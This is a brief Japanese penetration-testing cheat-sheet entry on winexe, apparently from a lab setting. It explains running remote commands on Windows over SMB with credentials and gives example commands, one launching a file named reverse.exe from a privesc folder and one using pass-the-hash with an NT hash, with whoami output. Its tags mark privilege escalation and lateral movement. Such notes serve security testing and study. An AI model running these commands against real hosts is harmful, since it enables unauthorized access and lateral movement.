winexe を使用して Windows ホストに対してリモートコマンドを実行する。
-U で ユーザー%パスワード を指定し、//IP で対象ホストを指定する。
最後に実行したいコマンドや実行ファイルパスを指定する。
SMB（TCP 445）経由でコマンドを実行するため、認証情報と共有アクセスが必要。
権限昇格検証やリモート実行の確認で使用する。

winexe -U admin%password123 //10.48.190.217 'C:\privesc\reverse.exe'

{none}

ハッシュ値があれば、いちいちレインボーしなくても、そのまま認証に使える。

winexe -U admin%a9fdfa038c4b75ebc76dc855dd74f0da --pw-nt-hash //10.48.128.183 cmd /c whoami

win-qba94kb3iof\admin

win,priv,横展開,lateral,ntlm